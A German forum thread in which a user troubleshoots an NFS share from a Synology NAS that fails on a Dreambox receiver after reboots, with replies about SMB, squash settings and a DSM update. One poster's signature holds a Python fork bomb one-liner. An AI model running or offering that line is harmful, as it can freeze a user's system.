Probleme bei der Einbindung eines Synology NAS mit dem Netzwerkbrowser

Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

• Neu

Beduin68 schrieb:

Synology bietet aktuell CIFS gar nicht an. Aktuell kann man dort nur noch AFP (Mac) und SMB aktivieren. Ist SMB das alte CIFS? Darüber hinaus habe ich auch keinen Windows PC.

Ach ja, und was ist mit den Freigabeoptionen?
      CIFS vs SMB

Zu deinem ursprünglichen problem mit dem NFS verstehe ich das richtig das die einbindung ~2-3 tage funktioniert und dann plötzlich nicht mehr? Und in diesen 2-3 tagen haste da die 7080 mal komplett neugestartet?
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Neu

Vielen Dank für die Information zum Thema CIFF vs. SMB. Wieder etwas dazugelernt. Ich denke aber dass man bei der Dreambox auf jeden Fall bei NFS bleiben sollte....

Und ja, ich habe die Box sogar mehrfach neu gestartet. Allein schon um die Updates zu laden und zu installieren. Darüber hinaus habe ich dann auch die Bouques wieder aktualisiert und neu gestartet.

Was den Squash angeht, so habe ich alle Varianten bereits durch. Wobei die Variante root als admin auch auf meiner Solo 4k (VTI Image) und auf der Dreambox 520 läuft.

Wenn man wenigstens mal einen Green Screen zu sehen bekommen würde... Vielleicht hat ja sonst noch jemand eine Idee... Aktuell bin ich kurz davor die Solo 4k aus dem Schlafzimmer ins Wohnzimmer zu stellen... Und eigentlich gefällt mir das VTI Image bzw. der Skin dazu überhaupt nicht.
      Dreambox 7080HD mit 4 X S auf Newnigma2
      Dereambox 500HD als Client per Partnerbox auf Merlin 3
    • Neu

Ich habe noch einmal den Hinweis von Kati hinsichtlich des Neustarts aufgegriffen. Ich würde schwören, dass ich vorher mehrmals einen Neutstart durchgeführt habe, ohne dass es danach zu Problemen gekommen ist. Aktuell sieht es wie fofgt aus.

Ich fahre die Box hoch mit gezogenem Netzwerkkabel
      Ich stecke das Netzwerkkabel wieder rein
      Ich lösche die NFS Freigabe
      Ich starte den Netzwerkbrowser und erstelle die gleiche Freigabe erneut
      Die Box läuft rund. Ich kann auf die Ordner zugreifen und auch Filme vom NAS abspielen.
      Nach einem Neustart sehe ich entweder den Spinner gleich oder aber beim ersten Umschalten oder beim Versuch auf die Filme zuzugreifen

Hat hier keiner eine Idee, woran das liegen kann. Vielleich sogar Hardware...? Ich habe jetzt zwar die VU Box im Wohnzimmer, will aber die Dreambox schnellstmöglich zurück. NN2 mit Metrix Style Skin ist halt mein Favorit!
    • Neu

Nein, die sind in Unterordnern. Die Freigabe der Unterordner habe ich auch im NAS aktiviert.

Die Freigabe auf dem NAS bezieht sich auf den Ordner Video. In diesem Ordner gibt es dann diverse Unterordner Movie, Action, Thriller, etc.

Als Aufnahmepfad habe ich den Ordner Movie gewählt. Darin sollen sämtliche Aufnahmen, Timeshift, etc. erstmal hin

P.S. Im Post 7 kannst du auch die Screenshots sehen

Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Beduin68 ()

• Neu

Ich hatte letzten Freitag plötzlich ein ähnliches Problem allerdings auf meiner Vu+ Hauptbox. Könnte aber die gleiche Ursache haben. Hast du kürzlich ein Update der Synology gemacht? Zufällig diese Version DSM 6.2.1-23824 Update 1? Und Welche Freigabeoptionen sind bei Dir gesetzt? Die sehe ich nicht in Deinen Screenshots. TCP oder UDP?
    • Neu

Hallo Traumkiste,

ich habe in der Tat das NAS auf dem Stand der Version 6.2.1-23824 Update 1. Wo kann ich denn in der Systemsteuerung die Freigabeoptionen sehen. Ich finde die nicht...